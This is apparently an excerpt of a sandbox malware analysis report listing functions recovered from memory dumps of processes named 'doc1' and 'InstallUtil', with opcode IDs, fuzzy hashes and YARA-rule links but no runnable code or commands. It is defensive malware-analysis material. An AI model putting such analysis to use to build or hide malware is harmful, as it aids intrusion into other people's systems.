                            • Instruction ID: 34b188b4c7123ff1bd63513f6fc38cfc72e5d83611fe5bd5e687a9308ec1d16e
                            • Opcode Fuzzy Hash: 4c3791e843631edd065716f1812cf2c0c5fcdb9c8fe5cf563e31bef9d6290ac8
                            • Instruction Fuzzy Hash: 6641F6749012199FDB64DF68C988B9DBBF2FB48311F2481D8D809A7295C735AEC1CF90
                            Function 05761760 Relevance: 5.1, Strings: 4, Instructions: 55COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: &$:$N$c
                            • API String ID: 0-917142840
                            • Opcode ID: f0dca1c73fa9e8f3904ea2025a2f8cf49ce402370c1ed70f09855c42906b8337
                            • Instruction ID: ffb440a44dd89389be5c8a29f2262dfb46310c9b89af88db78ef999e4ad12727
                            • Opcode Fuzzy Hash: f0dca1c73fa9e8f3904ea2025a2f8cf49ce402370c1ed70f09855c42906b8337
                            • Instruction Fuzzy Hash: 0621CD70A1122CCFDB68DF68C889BECBBB1BB09314F6450A9C949A7240DBB44AC5DF51

                            Executed Functions

                            Function 00DDB338 Relevance: 4.1, Strings: 3, Instructions: 357COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0op$Ljp$Ljp
                            • API String ID: 0-600165640
                            • Opcode ID: 18d1d4422e8a65b7b7d8856d8b8d6016e5ae11404f496ed3545fa1aeeb5dc539
                            • Instruction ID: 79edabc3aa711b632c6a7da4c87c00db644fd095d099d7eba9d9058fea03815a
                            • Opcode Fuzzy Hash: 18d1d4422e8a65b7b7d8856d8b8d6016e5ae11404f496ed3545fa1aeeb5dc539
                            • Instruction Fuzzy Hash: AFE1D975A00618DFDB14DFA9D884A9DBBF1FF49314F16806AE859AB362D730AC41CF60
                            Function 00DDBDA0 Relevance: 4.0, Strings: 3, Instructions: 205COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0op$Ljp$Ljp
                            • API String ID: 0-600165640
                            • Opcode ID: 56c00695bcc1723ff11377cb0f13003b56e050e91ec9ad3ba2414cd04ccfb681
                            • Instruction ID: 650b04be205f14560ec5e690912bc02a7194eca580d43e3317537de6718a4aca
                            • Opcode Fuzzy Hash: 56c00695bcc1723ff11377cb0f13003b56e050e91ec9ad3ba2414cd04ccfb681
                            • Instruction Fuzzy Hash: BA91B474E00618CFDB14DFAAD884A9DBBF2FF89314F15806AE419AB365DB349945CF20
                            Function 00DDBAC0 Relevance: 4.0, Strings: 3, Instructions: 203COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0op$Ljp$Ljp
                            • API String ID: 0-600165640
                            • Opcode ID: 2df28bdf6a09440614f827c9409589b1ef16e54fc934e5ca64775be02d277020
                            • Instruction ID: 444e175602f4dfffd530aa8c52c4916ff44ad0b3a635878c464f1bc53feb6fc3
                            • Opcode Fuzzy Hash: 2df28bdf6a09440614f827c9409589b1ef16e54fc934e5ca64775be02d277020
                            • Instruction Fuzzy Hash: 7F91C674E00218CFDB14DFAAD884A9DBBF2FF88314F15806AE419AB365DB349941CF60
                            Function 00DDB7E3 Relevance: 3.9, Strings: 3, Instructions: 198COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0op$Ljp$Ljp
                            • API String ID: 0-600165640
                            • Opcode ID: cac7e706bdf831ba870a64516fbcd0567c10922e0a2b0e544b46ef537ce76cf3
                            • Instruction ID: d49b880971352f121a05ea0e260c5427900bc7972cfe79c80272d04ac6bd210b
                            • Opcode Fuzzy Hash: cac7e706bdf831ba870a64516fbcd0567c10922e0a2b0e544b46ef537ce76cf3
                            • Instruction Fuzzy Hash: FF91D474E00218CFDB14DFAAD894A9DBBF2FF88314F15806AD549AB365DB309941CF20
                            Function 00DDC761 Relevance: 3.9, Strings: 3, Instructions: 191COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0op$Ljp$Ljp
                            • API String ID: 0-600165640
                            • Opcode ID: 99a60dfc54928832d603beb6d29ecaa3a06d07f806d2133c1dc63c281f36449a
                            • Instruction ID: 0ebc85e36380fe9bf7212d7a29e43d72383e599729bd794cbbe4e7a2ba540569
                            • Opcode Fuzzy Hash: 99a60dfc54928832d603beb6d29ecaa3a06d07f806d2133c1dc63c281f36449a
                            • Instruction Fuzzy Hash: A681D574E00218DFDB14DFAAD894A9DBBF2FF88311F14906AE449AB365DB349941CF60
                            Function 00DD46D9 Relevance: 3.9, Strings: 3, Instructions: 188COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0op$Ljp$Ljp
                            • API String ID: 0-600165640
                            • Opcode ID: 57f2e902f5391a732796f2c8be9521f6acdf82a3838dcbd40fe5a5eea0fc2735
                            • Instruction ID: 7ad6ed4a7e1752844e1e8246c42ebfda0439ae4bf86d90bce0307f574c6a1c73
                            • Opcode Fuzzy Hash: 57f2e902f5391a732796f2c8be9521f6acdf82a3838dcbd40fe5a5eea0fc2735
                            • Instruction Fuzzy Hash: 3481B474E00258DFDB14DFAAD884A9DBBF2FF89310F24806AD419AB365DB349941DF60
                            Function 00DDCA41 Relevance: 3.9, Strings: 3, Instructions: 188COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0op$Ljp$Ljp
                            • API String ID: 0-600165640
                            • Opcode ID: c0f9bca745fc7eabdddec8292eeae9a9fe1c04d4c2ec3f57556dcd5d3e1a2979
                            • Instruction ID: 274b4e06331ba177f6c9c2f5aa3ecbc7fbd6da273cf143635c85553b1cced332
                            • Opcode Fuzzy Hash: c0f9bca745fc7eabdddec8292eeae9a9fe1c04d4c2ec3f57556dcd5d3e1a2979
                            • Instruction Fuzzy Hash: 9681A574E10218CFDB14DFAAD894A9DBBF2FF88310F14906AD809AB365DB349941CF60
                            Function 00DDC080 Relevance: 3.9, Strings: 3, Instructions: 187COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0op$Ljp$Ljp
                            • API String ID: 0-600165640
                            • Opcode ID: b2e93631f48a56e1596378cd427e0410597d4f4f0aa97cfbdaeed17e1879df73
                            • Instruction ID: 37be6289a5fc15c9abb6072ef532840641e20f92afd2426eb2f5bf36ab4dd972
                            • Opcode Fuzzy Hash: b2e93631f48a56e1596378cd427e0410597d4f4f0aa97cfbdaeed17e1879df73
                            • Instruction Fuzzy Hash: 6381A574E00619CFDB14DFAAD884A9DBBF2FF89310F14906AE449AB365DB349941CF60
                            Function 00DDB503 Relevance: 1.4, Strings: 1, Instructions: 164COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0op
                            • API String ID: 0-2001708241
                            • Opcode ID: 5650a53e51ec0047d5ea303f3a7d528fa0f0fb0c6289f453332b70043d1f148d
                            • Instruction ID: e99d763e1552c4783594fe07692dfaf440a3d97a6b875249ab2dda91c17e62b1
                            • Opcode Fuzzy Hash: 5650a53e51ec0047d5ea303f3a7d528fa0f0fb0c6289f453332b70043d1f148d
                            • Instruction Fuzzy Hash: 0D61B774E00608DFDB14DFAAD884A9DBBF2FF89314F15806AD419AB365DB349942CF50
                            Function 00DD97F8 Relevance: .9, Instructions: 896COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8a0af2716b069d84538d99d8356f286dd168f9df13b7194f4db15fcf587c8624
                            • Instruction ID: 6d49411e8ebd5435198de34bd9c1ee2ce2b14de8b83738cb586bfbf15796d56e
                            • Opcode Fuzzy Hash: 8a0af2716b069d84538d99d8356f286dd168f9df13b7194f4db15fcf587c8624
                            • Instruction Fuzzy Hash: 6D826A75A00209DFCB15CFA8C894AAEBBF2FF88300F15855AE8459B3A1D735ED45CB61
                            Function 00DDE441 Relevance: .7, Instructions: 712COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: da97c2ebd9c4ad514e0dfb21d6a04fa2591ecd550c87a6d625ab083088b628e2
                            • Instruction ID: 19485006a41c56d0cb11a1abf5da2abd6b59371c9fce3ca85eb892f64a54fd83
                            • Opcode Fuzzy Hash: da97c2ebd9c4ad514e0dfb21d6a04fa2591ecd550c87a6d625ab083088b628e2
                            • Instruction Fuzzy Hash: 6972BF74E012298FDB64DF69C984BEDBBB2BB49301F1481EAD449AB355DB309E81CF50
                            Function 00DD6120 Relevance: .5, Instructions: 513COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e8ef271bb302733563cfb1062f430ef0e8d7679cefb9e73b44df3d6ad7a7a4aa
                            • Instruction ID: bc62f0c4b00afdc2ebeea0a2b441eb1445f7b64df29c5930de9b1f51c4f23bc4
                            • Opcode Fuzzy Hash: e8ef271bb302733563cfb1062f430ef0e8d7679cefb9e73b44df3d6ad7a7a4aa
                            • Instruction Fuzzy Hash: 81125D74A002199FDB18DF69C854BAEBBF6BF88300F24856AE506DB391DB34DD45CB90
                            Function 00DD6748 Relevance: .5, Instructions: 465COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 13914978b38259b67e7c89d3f2c4e7a418b5564e917f4b1a1b88980fab5bff9c
                            • Instruction ID: be48da7bcff835548f1445049ca3c5f8c1a6900f334417a481887ef93f5ca30a
                            • Opcode Fuzzy Hash: 13914978b38259b67e7c89d3f2c4e7a418b5564e917f4b1a1b88980fab5bff9c
                            • Instruction Fuzzy Hash: A6122E74A002199FDB24CF69C844AAEBBF2FF49301F198066E455EB3A1D735DC55CBA0
                            Function 00DDF788 Relevance: .3, Instructions: 275COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f8f449231dbc5128c7ec09a93fa686cc07b86c2baa85035e30e0f78e09b1bd8a
                            • Instruction ID: 9f2cb4c9b1da21eadccebca5f366b0c207a418088a396ddc05529e83f8e8d688
                            • Opcode Fuzzy Hash: f8f449231dbc5128c7ec09a93fa686cc07b86c2baa85035e30e0f78e09b1bd8a
                            • Instruction Fuzzy Hash: 23D19274E01218CFDB14DFA5D994BADBBB2FF89300F2480AAD809A7355DB355A85CF50
                            Function 00DD7808 Relevance: .7, Instructions: 703COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: aaa7b1526dc5f0b7d752403a51e65540a1c4dd31c3006df5650f8e3153f56bff
                            • Instruction ID: d055c2784f3c2763d3544d191c122d82756f17b4c7796df07ab5c75a4c0f3ffa
                            • Opcode Fuzzy Hash: aaa7b1526dc5f0b7d752403a51e65540a1c4dd31c3006df5650f8e3153f56bff
                            • Instruction Fuzzy Hash: 5B520334A00218CFEB55DFA4C860BAEBBB6EF95700F1081AAD20AA7355CF355D85DF61
                            Function 00DD8801 Relevance: .5, Instructions: 496COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6d789e12a55a4eacffdbbc4134f8c195a3e0747e85ecd62d20dd57ecc3919bda
                            • Instruction ID: 8ce76982ba2abfa36147b593c4ae977e8bb3cccfc245e85a34eb87d4586ba899
                            • Opcode Fuzzy Hash: 6d789e12a55a4eacffdbbc4134f8c195a3e0747e85ecd62d20dd57ecc3919bda
                            • Instruction Fuzzy Hash: EEF18F707046018FDB269F29C868B3976A6EF85700F1A44ABE152CF3F1DE25DC81E762
                            Function 00DD6E70 Relevance: .5, Instructions: 476COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3442a790ad78843a4ad0f8a015a256c7349cf384acd5fbc141a9cebc45871b0c
                            • Instruction ID: cd72ddca6c35da4493248859eddc4c327c7916dc30b7440626494dae75951307
                            • Opcode Fuzzy Hash: 3442a790ad78843a4ad0f8a015a256c7349cf384acd5fbc141a9cebc45871b0c
                            • Instruction Fuzzy Hash: A3125B34A04649CFCB24CF68D884A9EBBF1FF49314F15859AE8559B3A1E730ED41CBA0
                            Function 00DDA85F Relevance: .4, Instructions: 408COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f1da434373bd056cbc3b0d6274c72b45acc628f1d69f45d42cbb852043d3c94a
                            • Instruction ID: 140e75e880ec96099b094e7e00a77d7db9c51065b586b2f2c7133798f5371334
                            • Opcode Fuzzy Hash: f1da434373bd056cbc3b0d6274c72b45acc628f1d69f45d42cbb852043d3c94a
                            • Instruction Fuzzy Hash: 1AF12A75A402158FCB15CF6CC984AADBBF2FF88311B1AC05AE515AB362D735EC42CB61
                            Function 00DD0C8F Relevance: .4, Instructions: 401COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 65b6f9407cf4f7bc3a264a13d22228ccc7f8c6104bba324eecf57cdb908c6ce6
                            • Instruction ID: 8b311dd8f461096f1096b1ffcd1a31a3bc0da026ca3448e2eca16b1a95436140
                            • Opcode Fuzzy Hash: 65b6f9407cf4f7bc3a264a13d22228ccc7f8c6104bba324eecf57cdb908c6ce6
                            • Instruction Fuzzy Hash: EE22A67891021ACFDB54EF64E894B9DBBB2FF49301F1086A9D909A7358DB306E46CF50
                            Function 00DD0CA0 Relevance: .4, Instructions: 395COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c0a22bf3e9a513e924ce816821008188b1177d2e4022a553b878ab104fcf3b6e
                            • Instruction ID: cdd33fc16aad08fd3b87e473d29cb1cf7bfd62542636039ccf2057fbaa8c9f2b
                            • Opcode Fuzzy Hash: c0a22bf3e9a513e924ce816821008188b1177d2e4022a553b878ab104fcf3b6e
                            • Instruction Fuzzy Hash: 1F22867891021ACFDB54EF64E894B9DBBB2FF48311F1086A9D909A7358DB306E46CF50
                            Function 00DD56B0 Relevance: .3, Instructions: 327COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 296e90a41c42495edb6ade0ff011c8af535bce014520a691ad4ecf51580746da
                            • Instruction ID: 6b28286510dc20a6aff6d56526cfc9a896e890cc2905de267a0301705ceaaeba
                            • Opcode Fuzzy Hash: 296e90a41c42495edb6ade0ff011c8af535bce014520a691ad4ecf51580746da
                            • Instruction Fuzzy Hash: 84B10535704610DFEB158F34E854B2A7BE2AF89310F28856AE446CB385DF34DC45DBA0
                            Function 00DD5C10 Relevance: .2, Instructions: 230COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4dfdfeee859f2aab8a354bc209f466e72230a8fbf8bec68d1dcd43ff6d1ea209
                            • Instruction ID: 22ec51a2b943c8c11ad8306e1c08c4c5db2deb614fcad636af1a94a93233fbfd
                            • Opcode Fuzzy Hash: 4dfdfeee859f2aab8a354bc209f466e72230a8fbf8bec68d1dcd43ff6d1ea209
                            • Instruction Fuzzy Hash: CE817234A00A05CFDB14DF69D84896ABBF2FF89315B29816AE405DB369DB31DD41CBB0
                            Function 00DD7450 Relevance: .2, Instructions: 201COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2adb4e6ad8aa7531df67383f417c3ba32900f53df3f4ccc3b61eb889cdce6214
                            • Instruction ID: a937cc669d5bf9ab83aa48b98960fa2c5f68c063d257b68afc4a5e2022aabd83
                            • Opcode Fuzzy Hash: 2adb4e6ad8aa7531df67383f417c3ba32900f53df3f4ccc3b61eb889cdce6214
                            • Instruction Fuzzy Hash: 557107347086458FCB65DF2CD898A6A7BE5AF49300F1940EAE915CB3B1EB71DC41CBA1
                            Function 00DDCED7 Relevance: .2, Instructions: 176COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ee53b030450ae80de81355cba234c3a0e480b3a4b56e8187eaff9155c9050e71
                            • Instruction ID: bd00fca10835f39f82bd10a6ce23609a69bf7162374a1c0a811d22cb1316365e
                            • Opcode Fuzzy Hash: ee53b030450ae80de81355cba234c3a0e480b3a4b56e8187eaff9155c9050e71
                            • Instruction Fuzzy Hash: E051C1788B1703CFD2642B20F6AC16A7FB4FB0F323756ED05A00EC51A59B7064698B60
                            Function 00DDCEE8 Relevance: .2, Instructions: 167COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4300314caf232505cbb24f69851b6c21da9c67436254459079cbbece9576b5b8
                            • Instruction ID: 15a869049fdc7d5c542ddcb4e8085218811501152fd2ec093ad5f640c6aa7707
                            • Opcode Fuzzy Hash: 4300314caf232505cbb24f69851b6c21da9c67436254459079cbbece9576b5b8
                            • Instruction Fuzzy Hash: C551A2788B1703CFD2642B20F6AC12A7FB5FB0F323756ED05A00EC51A99B7064698B64
                            Function 00DDD5AF Relevance: .2, Instructions: 150COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e2fe13d6cc0c75080d91419bb512c6888af5f562e1b81cb41209a41419c58752
                            • Instruction ID: 0963af5a4fb3f989fb13046dbad2c2bd91a0ab519c338d59104e42939859e338
                            • Opcode Fuzzy Hash: e2fe13d6cc0c75080d91419bb512c6888af5f562e1b81cb41209a41419c58752
                            • Instruction Fuzzy Hash: 3B612778D01218CFDB25DFA4D854BAEBBB2FF89300F208569D805AB395DB755A4ACF40
                            Function 00DDCD20 Relevance: .1, Instructions: 142COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e43d95839068dc4704107dc06a6274148f48f970969a7eb03355eb8f866c0ec7
                            • Instruction ID: 22f35f81845376ce6acbbd3b6c9ddf35686c2ca2592f842dd06c18b6b3dc2ab4
                            • Opcode Fuzzy Hash: e43d95839068dc4704107dc06a6274148f48f970969a7eb03355eb8f866c0ec7
                            • Instruction Fuzzy Hash: 01519574E01208DFDB44DFA9D98499DBBF2FF89300F20916AE805AB364DB31A905CF50
                            Function 00DD3908 Relevance: .1, Instructions: 134COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e7042869f595ad176c18bd0beb5849420a6641f5322a43bca96ae56f15e89c1d
                            • Instruction ID: a0ef4a7dcef485150eb3870f0fc8f5b387ec22936dda159de3df254f360aa051
                            • Opcode Fuzzy Hash: e7042869f595ad176c18bd0beb5849420a6641f5322a43bca96ae56f15e89c1d
                            • Instruction Fuzzy Hash: 9A51A874E01248DFCB08DFA9D59099DBBF2FF89310B20956AE805AB364DB31AD46CF50
                            Function 00DDE521 Relevance: .1, Instructions: 130COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 90a980515e5676b5097a9085ec374d8743bd337e00a867fa4db7da318b170a94
                            • Instruction ID: 10f95d9f6ba6ef276ca96b99c626f36a5a2157709f5781ed8dbfe8d9dfb68771
                            • Opcode Fuzzy Hash: 90a980515e5676b5097a9085ec374d8743bd337e00a867fa4db7da318b170a94
                            • Instruction Fuzzy Hash: B151AC74D02228CFCB24DF64D984BEDBBB2EB89301F1055AAE409AB350D735AE85CF10
                            Function 00DDA660 Relevance: .1, Instructions: 123COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3a292006aaee63cf823db27690343330ace6158678b83627d644831cd9c76d2e
                            • Instruction ID: c25df1dac8ef55da8bed8fadfc5a5b322f28ac8172924f670911c4f70abb87d2
                            • Opcode Fuzzy Hash: 3a292006aaee63cf823db27690343330ace6158678b83627d644831cd9c76d2e
                            • Instruction Fuzzy Hash: 86411039B042049FCB199F69D854AAE7FF6AFCD311F24846AE906D7390CE358C05CBA1
                            Function 00DD9A73 Relevance: .1, Instructions: 123COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 02b8d25ef93a2703705b415070f417e973a5fbd541c6de1ad887defea2944fd2
                            • Instruction ID: 73bc238b1285486b50ac5a1b56366d526ac515ca2812ea27602a044dda266651
                            • Opcode Fuzzy Hash: 02b8d25ef93a2703705b415070f417e973a5fbd541c6de1ad887defea2944fd2
                            • Instruction Fuzzy Hash: 8B41AD31A04249DFCF11CFA8C8A4A9DFBB2EF4A310F158557E8559B391D336E915CB60
                            Function 00DD1EF8 Relevance: .1, Instructions: 116COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a9958ead8f770cd9bbda24ff5d86dfc6f790857662f92691ad2d2035f87fb5dc
